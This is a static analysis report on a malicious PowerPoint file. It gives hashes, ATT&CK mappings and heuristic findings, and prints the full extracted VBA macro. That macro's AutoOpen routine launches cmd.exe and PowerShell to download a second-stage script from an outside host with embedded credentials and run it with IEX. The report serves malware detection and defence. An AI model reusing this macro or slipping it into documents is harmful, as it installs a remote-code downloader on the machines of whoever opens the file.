Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 66785fb31ae7dd28…

MALICIOUS

Office (OOXML)

30.2 KB Created: 2019-11-22 12:29:11 UTC Authoring application: Microsoft Office PowerPoint 15.0000 First seen: 2021-06-04
MD5: d878844caf16323c02a3ebf04e0e3e53 SHA-1: 6e3de699f04a2c552d53635df91793811ba5b7cf SHA-256: 66785fb31ae7dd28da8e421118288dabc8458c8e2b570c651e4e4db8ce451dd5
270 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.001 PowerShell T1204.002 Malicious File T1071.001 Web Protocols

The sample contains a VBA macro with an AutoOpen subroutine that executes a PowerShell script. This script is designed to download a second-stage payload from the URL 'https://malware.scenarios.aiqscenarioinfra.com/e475ee693b2b0b435dee9ce9e8f5121f179925be35cea6bb92f3f2b0f0bceffa/payload.ps1', verifying its integrity via an MD5 hash check ('b5fc4be33ae7ede9c221cd70a3f8497c') before execution. The use of Shell() and cmd.exe references further indicates the execution of external commands.

Heuristics 8

  • VBA project inside OOXML medium 6 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
      Dim g: g = " else {'Invalid HASH for PowerShell script'; exit -2 }"
  PID = Shell(a & b & c & d & e & f & g)
End Sub
  • PowerShell reference in VBA critical OLE_VBA_PS
    PowerShell reference in VBA
    Matched line in script
      Dim a: a = "C:\Windows\System32\cmd.exe"
  Dim b: b = " /c powershell -NoP -sta -NonI"
  Dim c: c = " function get-hash([string]$textToHash){ $hasher = new-object System.Security.Cryptography.MD5CryptoServiceProvider; $toHash = [System.Text.Encoding]::UTF8.GetBytes($textToHash); $hashByteArray = $hasher.ComputeHash($toHash); foreach($byte in $hashByteArray) {$result += '{0:X2}' -f $byte};return $result;}"
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    On Error Resume Next
Set powerPointApp = GetObject(Class:="PowerPoint.Application")
If Not powerPointApp Is Nothing Then powerPointApp.Quit
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
    Matched line in script
    Private Sub payload()
  Dim a: a = "C:\Windows\System32\cmd.exe"
  Dim b: b = " /c powershell -NoP -sta -NonI"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    ' triggered when PowerPoint generator is used
Sub AutoOpen()
    LaunchMacroPPT
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL https://malware.scenarios.aiqscenarioinfra.com/e475ee693b2b0b435dee9ce9e8f5121f179925be35cea6bb92f3f2b0f0bceffa/payload.ps1 In document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 1702 bytes
SHA-256: d778b42bf40f3fd4b179a05dde93f36d09d5756ed978d201b98addeec0937017
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Módulo1"

Private Sub payload()
  Dim a: a = "C:\Windows\System32\cmd.exe"
  Dim b: b = " /c powershell -NoP -sta -NonI"
  Dim c: c = " function get-hash([string]$textToHash){ $hasher = new-object System.Security.Cryptography.MD5CryptoServiceProvider; $toHash = [System.Text.Encoding]::UTF8.GetBytes($textToHash); $hashByteArray = $hasher.ComputeHash($toHash); foreach($byte in $hashByteArray) {$result += '{0:X2}' -f $byte};return $result;}"
  Dim d: d = " try{$webclient = new-object System.Net.WebClient;$credCache = new-object System.Net.CredentialCache;$creds = new-object System.Net.NetworkCredential('aiq_mlwre_scenarios','nTrBxu74T8u9');$credCache.Add('https://malware.scenarios.aiqscenarioinfra.com/e475ee693b2b0b435dee9ce9e8f5121f179925be35cea6bb92f3f2b0f0bceffa/payload.ps1', 'Basic', $creds);$webclient.Credentials = $credCache;"
  Dim e: e = " $e=$webclient.DownloadString('https://malware.scenarios.aiqscenarioinfra.com/e475ee693b2b0b435dee9ce9e8f5121f179925be35cea6bb92f3f2b0f0bceffa/payload.ps1');}"
  Dim f: f = " catch [Net.WebException]{'Download failed'; exit -1 }; if ((get-hash($e)) -eq 'b5fc4be33ae7ede9c221cd70a3f8497c') { IEX $e; }"
  Dim g: g = " else {'Invalid HASH for PowerShell script'; exit -2 }"
  PID = Shell(a & b & c & d & e & f & g)
End Sub

Private Sub LaunchMacroPPT()
    payload
    ClosePowerPoint
End Sub

' triggered when PowerPoint generator is used
Sub AutoOpen()
    LaunchMacroPPT
End Sub

Public Sub ClosePowerPoint()

Dim powerPointApp As Object

On Error Resume Next
Set powerPointApp = GetObject(Class:="PowerPoint.Application")
If Not powerPointApp Is Nothing Then powerPointApp.Quit

End Sub
vbaProject_00.bin vba-project OOXML VBA project: ppt/vbaProject.bin 10752 bytes
SHA-256: eabd78152aa15e688141c123359089bae6812919058d65f84b10762cc8809e59

Open this report in the interactive analyzer, or submit your own file for analysis.